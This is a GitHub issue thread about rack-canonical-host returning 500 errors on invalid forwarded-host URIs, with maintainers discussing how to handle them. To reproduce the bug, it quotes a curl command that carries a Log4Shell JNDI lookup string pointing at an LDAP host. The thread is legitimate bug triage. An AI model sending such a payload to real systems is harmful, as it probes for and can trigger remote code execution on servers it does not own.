### ISSUE TITLE
Handle invalid URIs

### ISSUE THREAD

**Issue by G-Rath** [tylerhunt/rack-canonical-host#68]
We've had a few events in our error monitoring due to an automatic scanner checking for log4j vulnerabilities using `X-Forwarded-For`:

```
❯ curl -ikH 'X-Forwarded-Host: [${jndi:ldap://172.16.26.190:52314/nessus}]/' example.com
HTTP/2 500
date: Tue, 12 Mar 2024 19:37:44 GMT
content-length: 77
server: nginx

An unhandled lowlevel error occurred. The application logs may have details.
```

This happens because this `request_uri` does not handle the URI being invalid:

https://github.com/tylerhunt/rack-canonical-host/blob/134f76f90d73f577b4359360f8be4f138e1e08b0/lib/rack/canonical_host/redirect.rb#L86-L88

I think instead what should probably happen is that the error is caught and the request considered _not_ canonical (thus triggering a redirect) since implicitly the canonical URL must be a valid URI so whatever the requests current url is cannot be canonical.

I'm happy to have a go at a PR for this if folks agree it should be addressed here

**Comment by ryanfb** [comment]
Would changing the patch in #64 to simply `return false` when `Addressable::URI::InvalidURIError` is raised inside `canonical?` cause it to return a redirect?

**Comment by tylerhunt** [comment]
The problem with returning `false` from `#canonical?` is that the URL rewriting will also fail with `Addressable::URI::InvalidURIError`.

If the request is for an invalid URL, I'm not sure how this should be handled, since we won't be able to properly identify the correct scheme or path.

One way that I've looked at handling this is to ignore the `X-Forwarded-For`/`Forwarded` headers, but I don't claim to fully understand what the security implications of doing so might be.

It seems to me the safest approach is to simply continue to have invalid requests result in a 500 error. If you need different behavior, maybe a separate middleware to handle a redirect to a known-safe URL if the requested URL is invalid would be appropriate.
